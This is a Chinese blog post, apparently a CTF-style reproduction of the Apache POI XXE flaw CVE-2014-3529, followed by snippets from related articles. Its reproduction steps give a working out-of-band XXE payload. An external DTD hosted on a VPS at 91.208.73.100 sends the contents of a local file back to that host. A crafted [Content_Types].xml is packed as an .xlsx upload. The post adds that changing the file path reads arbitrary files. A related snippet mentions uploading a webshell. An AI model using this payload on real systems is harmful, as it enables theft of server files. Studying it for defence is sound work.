Apache POI 3.10.1外部实体漏洞(CVE-2014-3529)

于 2024-07-29 10:21:20 发布
阅读量306 收藏 4
点赞数 7
分类专栏: # XXE # 文件读取 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140764098
版权

一、漏洞概述

Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。

二、影响范围

Apache POI < 3.10.1

三、访问页面

四、漏洞复现

1、准备一台vps服务器IP为91.208.73.100,上传xxe.dtd到服务器上。

<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://91.208.73.100:6666/%file;'>">
%all;

2、开启临时http服务,端口和xxe.dtd对应上。

python3 -m http.server 6666

3、制作payload,[Content_Types].xlsx

首先,制作[Content_Types].xml

<!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> 
<!ENTITY % dtd SYSTEM "http://91.208.73.100:6666/xxe.dtd">
%dtd; %send;]>

然后到[Content_Types].xml进行压缩为zip文件,得到[Content_Types].zip

最后是重命令[Content_Types].zip为[Content_Types].xlsx

4、在页面上传[Content_Types].xlsx

5、上传成功,复制5dc1729d-2398-47ac-b17d-faa106807356.xlsx这部分内容。

6、解析excel

7、查看vps服务器回显获得flag。

五、漏洞利用

1、修改[Content_Types].xml中的file:///flag达到任意文件读取。

风中追风-fzzf
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[20][03][06] Apache POI 安全漏洞(CVE-2019-12415)
安全新司机
12-21 6993
文章目录1. 描述2. 场景3. 漏洞复现3.1 引入 apache poi 组件 4.1.0 版本3.2 下载测试用例 excel3.3 制作恶意 excel3.4 测试代码4. 修复方案 1. 描述 Apache POIApache 的一个开源函数库,它提供API给Java程序可对 Excel 进行读和写操作的组件 poi 组件存在以下 CVE 2. 场景 此次要分析的是 CVE-2019-12415 Apache POI 版本 <= 4.1.0 中,当使用 XSSFExportToXml
poi-3.10.1上传组件jar包 po poi-ooxml poi-ooxml-schemas
10-27
1. poi-3.10.1.jar:这是Apache POI的主要库,包含了处理HSSF(旧版的Excel格式)和XSSF(XML格式的Excel)的核心功能。它提供了API来操作单元格、行、工作表等Excel元素,以及创建新的工作簿、读取现有工作簿、写入...
[漏洞复现]Apache POI3.10.1 XXE(CVE-2014-3529
k5664524的博客
01-16 1600
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
CVE-2014-3529
守拙的博客
02-28 4988
一、 漏洞影响 poi-ooxml3.10及以下 二、环境搭建 1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取 2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.
Apache POI 安全漏洞
weixin_44778952的博客
11-12 2265
漏洞来源 http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201910-1431 漏洞详情 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在代码问题漏洞。攻击者可借助特制的文档利用该漏洞读取本地文件系统中或网络资源中的文件。 参考资料 来源:lists.apache.org 链接:ht
[漏洞复现]Apache POI < 3(2),网络安全面试必问
最新发布
2401_84185471的博客
04-10 286
Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!创建一个**[Content_Types].xml文件和xxe.dtd文件注意名字不可修改**因篇幅有限,仅展示部分资料。
[春秋云镜]CVE-2014-3529
niubi707的博客
11-30 2561
[春秋云镜]CVE-2014-3529 Apache POI 3.10.1 之前的 OPC SAX 设置允许远程攻击者通过 OpenXML 文件读取任意文件,该文件包含与 XML 外部实体 (XXE) 问题相关的 XML 外部实体声明和实体引用。
CVE-2014-3529-xxe任意文件读取
qq_30890029的博客
04-21 253
Content_Types].xml通过压缩工具压缩成[Content_Types].zip。将[Content_Types].zip命名为xxe.xlsx。vps开启服务 /在目录下放置一个xxe.dtd文件。命名:[Content_Types].xml。编写一个payload。4:查看log响应日志。
poi-5.2.0-API文档-中英对照版.zip
07-05
赠送jar包:poi-5.2.0.jar; 赠送原API文档:poi-5.2.0-javadoc.jar; 赠送源代码:poi-5.2.0-sources.jar; 赠送Maven依赖信息文件:poi-5.2.0.pom; 包含翻译后的API文档:poi-5.2.0-javadoc-API文档-中文(简体)-...
poi-5.2.0-API文档-中文版.zip
07-07
赠送jar包:poi-5.2.0.jar; 赠送原API文档:poi-5.2.0-javadoc.jar; 赠送源代码:poi-5.2.0-sources.jar; 赠送Maven依赖信息文件:poi-5.2.0.pom; 包含翻译后的API文档:poi-5.2.0-javadoc-API文档-中文(简体)版...
poi-ooxml-5.2.3.jar中文文档.zip
03-01
poi-ooxml-***.jar中文文档.zip,java,poi-ooxml-***.jar,org.apache.poi,poi-ooxml,***,org.apache.poi.ooxml,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,apache,poi,ooxml,中文API文档,手册,开发...
大华智慧园区poi任意文件上传漏洞(企业及时修复)
2301_80127209的博客
04-09 389
还是老规矩,fofa先上fofa指纹:body=”/WPMS/asset/lib/gridster/“主站页面如下上pocPOC文字版传了马以后直接访问文字路径:/upload/马子.jsp。
解决Apache POI 代码问题漏洞时,缺少类的问题 (CTPageMar 等)
Oxye
04-17 3185
目录问题代码漏洞告警寻找高版本解决方案一:根据告警提示替换依赖更新依赖步骤解决方案二:把缺少的类从旧包拷到本地解决方案三:终于找到靠谱的依赖总结 问题 先把问题放这 代码漏洞告警 昨天项目代码被检测到POI高危漏洞 漏洞级别:高危漏洞名称:Apache POI 代码问题漏洞 漏洞介绍 Apache POI是美国阿帕奇(Apache)软件基金会的一个开源函数库,它提供API给Java程序可对Microsoft Office格式档案进行读和写。 Apache POI 4.1.0及之前版本中存在安全漏洞。攻击者
解决poi漏洞升级后的代码编译错误
12-06 4852
描述:项目中的 poi 包有点旧,很多方法都没有,现在导入新的 poi 包,导致原先项目中的 代码报错。 描述:下面是遇到的一些报错,解决方案。代码如下: 解决办法:将 替换 注释中的代码即可代码如下: 解决办法:将 HorizontalAlignment.CENTER 替换 旧的即可 所在包:import org.apache.poi.ss.usermodel.HorizontalAlignment;代码如下: 解决办法:将 替换 旧的即可 所在包:代码如下: 解决办法:将 替换 旧
POI解析excel的漏洞CVE-2014-3574)
06-02 812
一、概述 最早的时候,java开发人员在操作excel的时候,用的最多的框架应该是poi、jxl。随着office的不断发展,office2007开始支持openXML的协议,后续陆续出现了新的框架支持操作office,如docx4j等。openXML使得数据的结构、组成更加透明,可...
[漏洞复现]Apache POI < 3,附相关架构及资料
m0_60575487的博客
04-06 405
车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**创建一个**[Content_Types].xml文件和xxe.dtd文件注意名字不可修改**
java操作POI 错误 org.apache.xmlbeans.XmlOptions
热门推荐
ID只有一个的博客
12-10 2万+
今天用JAVA写个读取 本地excel的程序 遇到错误: java.lang.ClassNotFoundException: org.apache.xmlbeans.XmlOptions 解决办法:   是少jar包的问题 添加   xbean.jar就OK 了!        写到这里突然想起来有次去面试,面试的人 问我 你的POI jar包的版本是多少。没注意过,所以就说了“
通过PIO读取和写入execl数据
weixin_45747278的博客
05-09 299
一:读取数据 1:首先需要准备jar包或者引入maven的依赖 <!-- poi报表--> <dependency> <groupId>org.apache.poi</groupId> <artifactId>poi</artifactId> <version>3.14</version> &lt
Provides transitive vulnerable dependency maven:org.apache.poi:poi:3.15 CVE-2017-12626 7.5 Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability pending CVSS allocation Results powered by Checkmarx(c)
03-10
这是一个关于 Maven 依赖漏洞的问题,我可以回答。该漏洞是关于 org.apache.poi:poi:3.15 的可传递漏洞依赖,存在一个无法到达退出条件的循环漏洞CVE-2017-12626,CVSS 分数尚未分配。这个问题可以通过 Checkmarx(c) 来解决。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值